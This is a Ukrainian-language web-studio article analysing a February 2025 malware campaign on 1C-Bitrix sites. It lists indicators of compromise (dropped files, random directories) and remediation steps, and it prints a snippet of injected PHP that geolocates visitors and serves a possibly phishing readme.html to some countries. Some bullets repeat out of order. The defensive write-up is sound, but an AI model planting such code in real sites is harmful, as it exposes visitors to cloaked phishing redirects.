Лютневий вірус на Бітрікс
Замовити послугу
На початку лютого 2025 року в мережі поширився вірус, який вражає сайти на платформі 1С-Бітрікс. Це шкідливе ПЗ вбудовується у файли проекту, створює додаткові директорії та виконує підозрілі дії, включаючи збирання інформації про користувачів та редиректи на зовнішні ресурси. Однак ознаки його активності вказують на модифікацію існуючих атакуючих методик, а не на зовсім новий вид загрози.
- Отримує IP-адресу користувача.
- Робить запит до сервісу ip-api.com, щоб визначити країну.
- Якщо користувач з Індонезії або США , підключає файл `readme.html`, який може містити фішингову сторінку або редирект.
Приклад шкідливого коду:
- Створення прихованих backdoor-скриптів.
- Запуск віддалених команд через `eval()` або `base64_decode()`.
- Підключення до зовнішніх серверів передачі даних.
- Може використовуватись для завантаження нових шкідливих скриптів.
- Найчастіше містить зашифрований чи обфусцированний код.
- **Крадіжка даних користувачів** (IP, браузер, геолокація).
- **Використання сервера для атак** (спам, DDoS, розміщення фішингових сторінок).
- Перевірити кореневий `index.php` на наявність шкідливого коду.
- Налаштувати `.htaccess` для захисту від завантаження файлів, що виконуються.
Основні ознаки зараження
Створення нових файлів та директорій:
- У папці `/aspro_regions/robots/` з'являються невідомі файли.
- У корені сайту додаються файли `robots.connections.php`, `wp-ver.php`, `index.php`.
- З'являються каталоги з випадковими іменами, наприклад `1a869/`, `a410f/`, що містять підмінені `index.php`.
Зміна головного
- У файл вбудовується шкідливий код перед підключенням `header.php`.
- Код використовує обфускацію (base64_encode, goto), що ускладнює його виявлення.
Розбір заражених файлів
1. `index.php`
Файл містить прихований код, який виконує такі дії:- Отримує IP-адресу користувача.
- Робить запит до сервісу ip-api.com, щоб визначити країну.
- Якщо користувач з Індонезії або США , підключає файл `readme.html`, який може містити фішингову сторінку або редирект.
Приклад шкідливого коду:
php
$ip = getUserIP();
$api_url = " http://ip-api.com/json/{$ip}" ;
$response = file_get_contents($api_url);
$ data = json_decode ($ response, true);
if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {
ob_start();
include "readme.html";
$output = ob_get_clean();
echo $output;
die;
}
`
2. `wp-ver.php`
Цей файл маскується під систему WordPress (`wp-` у назві), але насправді виконує:- Створення прихованих backdoor-скриптів.
- Запуск віддалених команд через `eval()` або `base64_decode()`.
- Підключення до зовнішніх серверів передачі даних.
3. `robots.connections.php`
- Цей файл керує зв'язком із зовнішніми серверами.- Може використовуватись для завантаження нових шкідливих скриптів.
- Найчастіше містить зашифрований чи обфусцированний код.
Ціль вірусу
- **Перехоплення трафіку** (редиректи на фішингові сайти).- **Крадіжка даних користувачів** (IP, браузер, геолокація).
- **Використання сервера для атак** (спам, DDoS, розміщення фішингових сторінок).
Як захиститись?
1. Перевірити файли та директорії
- Видалити `robots.connections.php`, `wp-ver.php`, невідомі `index.php`.- Перевірити кореневий `index.php` на наявність шкідливого коду.
2. Оновити CMS та модулі
- Переконайтеся, що ви використовуєте актуальну версію Бітрікс.3. Обмежити доступ до сервера
- Заборонити виконання `eval()` у PHP-конфігурації.- Налаштувати `.htaccess` для захисту від завантаження файлів, що виконуються.
4. Перевірити права доступу
- Заборонений запис в `/bitrix/`, `/local/` та `/upload/`.5. Провести антивірусну перевірку
- Використовувати `AI-Bolit`, `Virusdie`, `ClamAV` для сканування файлів.Висновок
Цей вірус – серйозна загроза для сайтів на Бітрікс . Важливо регулярно перевіряти файли, стежити за оновленнями та використовувати захисні механізми. Якщо ваш сайт заражений, рекомендується негайно видалити шкідливі файли, провести аудит безпеки та посилити захист.9 лютого 2025 (Boudybuilder) Виталий Фантич